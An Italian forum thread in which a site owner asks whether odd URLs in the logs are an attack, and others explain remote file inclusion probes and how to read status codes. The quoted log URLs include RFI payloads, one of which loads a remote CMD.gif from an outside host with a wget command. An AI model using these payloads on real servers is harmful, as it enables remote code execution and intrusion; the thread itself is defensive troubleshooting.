Puo' essere un attacco hacker?

[Tr|k`Tr4k]

Ragazzi, vedendo le statistiche di un mio sito mi sono accorto che qualcuno ha visitato queste pagine che di sicuro non ho sul server:

http://ipmioserver/index.php?path=ht...ncludes/t.txt?
http://ipmioserver/index.php?adminpa...ncludes/t.txt?
http://ipmioserver/index.php?templat...ncludes/t.txt?
http://ipmioserver/index.php?templat...ncludes/t.txt?
http://ipmioserver/index.php?tpl=htt...ncludes/t.txt?
http://ipmioserver/index.php?config=...ncludes/t.txt?

Puo' essere un attacco hacker?

Anche ieri o l'altro ieri ho trovato qualcosa di simile:

http://ipmioserver/index.php?autoLoadConfig[420][0][autoType]=include&autoLoadConfig[420][0][loadFile]=http://omgmydbhere.gamexpress.co.il/CMD.gif?&cmd=wget


Sapete di che si tratta e come devo regolarmi?

[Habanero]

le richieste, indipendentemente dal fatto che le pagine non esistano sul tuo server, sono andate a buon fine? Se sono andate a buon fine sono associate ad uno status code 200, in caso contrario da un 4xx (tipicamente 404).

Attraverso quell'url l'attaccante ha testato se la pagina index.php del tuo server è vulnerabile ad una inclusione remota.

Capita che le pagine siano strutturate per includere un file (che dovrebbe essere locale al server) e che il nome dell'inclusione sia indicata nell'url

ad es

www.sito.com/index.php?file=file.php

etc...

Se il server è configurato per includere anche file esterni al server (da url) e se l'applicazione php è progettata male (non filtra a dovere il parametro prelevato dalla query string), un attaccante puo' tentare di includere un file esterno a suo piacimento.. se questo contine codice php è a tutti gli effetti possibile fare molti danni poichè il codice esterno viene eseguito sul tuo server.

Gli url da te indicati sono dei tentativi di inclusione remota. Per sapere se sono andati a buon fine devi gardare lo status code associato alla richiesta presente nei log.

[Tr|k`Tr4k]

Originariamente inviato da Habanero
le richieste, indipendentemente dal fatto che le pagine non esistano sul tuo server, sono andate a buon fine? Se sono andate a buon fine sono associate ad uno status code 200, in caso contrario da un 4xx (tipicamente 404).

Attraverso quell'url l'attaccante ha testato se la pagina index.php del tuo server è vulnerabile ad una inclusione remota.

Capita che le pagine siano strutturate per includere un file (che dovrebbe essere locale al server) e che il nome dell'inclusione sia indicata nell'url

ad es

www.sito.com/index.php?file=file.php

etc...

Se il server è configurato per includere anche file esterni al server (da url) e se l'applicazione php è progettata male (non filtra a dovere il parametro prelevato dalla query string), un attaccante puo' tentare di includere un file esterno a suo piacimento.. se questo contine codice php è a tutti gli effetti possibile fare molti danni poichè il codice esterno viene eseguito sul tuo server.

Gli url da te indicati sono dei tentativi di inclusione remota. Per sapere se sono andati a buon fine devi gardare lo status code associato alla richiesta presente nei log.

e se sono andati a buon fine cosa potrebbe succedere?
Nei log, cosa dovrei vedere di preciso?

[Habanero]

devi guardare nei log del server le voci che fanno riferimento alle richieste che hai indicato.
Se vicino trovi un codice 200 significa che la richiesta è andata a buon fine, se trovi un 404 la richiesta non è andata a buon fine.

Se vedi una delle richieste:

http://ipmioserver/index.php?path=ht...ncludes/t.txt?

cerca di includere la pagina:

http://209.240.93.36/search/includes/t.txt?

andando a quell'indirizzo si trova il codice che risulta essere:

<HTML><HEAD><TITLE>Vulner4bl3</TITLE>
<? echo "VulnerabLe" ?>

in pratica non fa nulla di dannoso testa solo se il sito è vulnerabile... se è vulnerabile l'inclusione imposta il title della pagina e stampa la parola "VulnerabLe".

Probabilmente è solo una fase di test...

[mark2x]

Forse qualcuno ha cercato di "testare" il tuo sito con un programma automatico a ciò adibito (tipo Acunetix Web Vulnerability Scanner).